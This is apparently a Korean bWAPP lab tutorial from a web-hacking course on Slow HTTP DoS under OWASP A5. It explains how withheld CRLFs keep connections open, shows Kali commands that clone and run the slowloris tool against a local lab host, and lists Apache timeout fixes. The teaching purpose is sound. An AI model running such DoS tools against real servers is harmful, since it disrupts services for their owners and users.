정보보안(구버전)/ bWAPP 2019. 2. 16. 13:12
웹 해킹 bWAPP - 68. A5 - Security Misconfiguration - Denial-of-Service(Slow HTTP DoS)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. Dos/DDos 공격
- 대량 패켓들을 전송하여 시스템/서버/네트워크 리소스를 고갈시켜 부하 발생, 요청 방해 및 연결 거부를 발생하는 공격이다.
- 단, 정보 유출에 대한 취약점은 없지만, 서비스가 마비되기 때문에 사용자 및 기업 입장에서 시간/비용 손실을 발생시킨다.
- DDos는 악성 코드에 감염된 시스템(좀비 PC)들을 이용하여 DoS 공격을 실시하는 방법이다.
- Ex) 최근 국내 Dos/DDos 공격 사례 : 디시인사이드
- 기사 : https://www.dailysecu.com/?mod=news&act=articleView&idxno=44010
http://news.mtn.co.kr/newscenter/news_viewer.mtn?gidx=2019011117453837457
3. Slow HTTP Dos
- 메세지 헤더의 마지막을 알리는 'empty line'을 포함시키지 않고 HTTP 요청을 조금씩/천천히 전송하여 웹-서버 대기
현상을 발생시키는 공격이다. (CRLF : Carriage Return and Line Feed)
- HTTP 헤더에 케리지리턴(/n/r)을 보내지 않음으로써 서버에게 더 보낼 데이터가 있는거 처럼 만들어서 연결 상태를
유지하는 공격이다. 이렇게 되면 서버에서 TCP 세션 개수가 계속 늘어나기 때문에 다른 연결을 실시 할 수 없게된다.
- 즉, 웹서버가 수신한 HTTP 헤더의 CRLF(0d 0a)가 두번 들어간 정보를 보고 Body 부분을 인식하는데, 이것을 한번만
인식하게 되면 'Body' 내용이 아직 도착을 안한것으로 인식하여 대기하게 된다.
정상적인 HTTP 요청
4. Security Misconfiguration - Denial-of-Service(Slow HTTP DoS)
- 이 시나리오는 'slowloris' 툴을 이용하여 Slow HTTP DoS 공격을 진행할 예정이다.
Ex1) Security Misconfiguration - Denial-of-Service(Slow HTTP DoS) 이해
보안 레벨 선택 및 시나리오 선택
bWAPP을 타겟으로하여 공격 실시
slowloris 다운로드(https://github.com/llaera/slowloris.pl)
root@kali:~# git clone https://github.com/llaera/slowloris.pl.git
root@kali:~# cd slowloris.pl/ root@kali:~/slowloris.pl# ls -l
root@kali:~/slowloris.pl# ./slowloris.pl
perl ./slowloris.pl -dns [www.example.com] -options
Type 'perldoc ./slowloris.pl' for help with options.
|
bWAPP 도메인 설정 실시
root@kali:~/slowloris.pl# vi /etc/hosts
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
:wq! |
와이어샤크 실행 및 eth1 캡처 실시
root@kali:~/slowloris.pl# wireshark & |
Slow HTTP Dos 공격 실시
root@kali:~/slowloris.pl# ./slowloris.pl -dns www.bwapphttpslow.com Building sockets. Building sockets. Sending data. Sending data.
(Ctrl+C) |
와이어샤크 캡처 내용 확인
bWAPP TCP 연결 상태 확인
bee@bee-box:~$ netstat -nt
~ 중간 생략 ~ |
Ex2) Security Misconfiguration - Denial-of-Service(Slow HTTP DoS) 해결 방안
- 'ThreadsPerChild', 'KeepAliveTimeout 15' 값 변경
bee@bee-box:~$ cd /etc/apache2
bee@bee-box:/etc/apache2$ gedit apache2.conf
~ 중간 생략 ~
# worker MPM
~ 중간 생략 ~
# KeepAliveTimeout: Number of seconds to wait for the next request from the
:q! |
- 방화벽에서 Slowloris 공격 탐지 기능 사용
- 상위 버전 업그레이드/패치 실시
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 68. A5 - bWAPP Security Misconfiguration - Denial-of-Service(Slow HTTP DoS) https://youtu.be/RjoD4We6q8k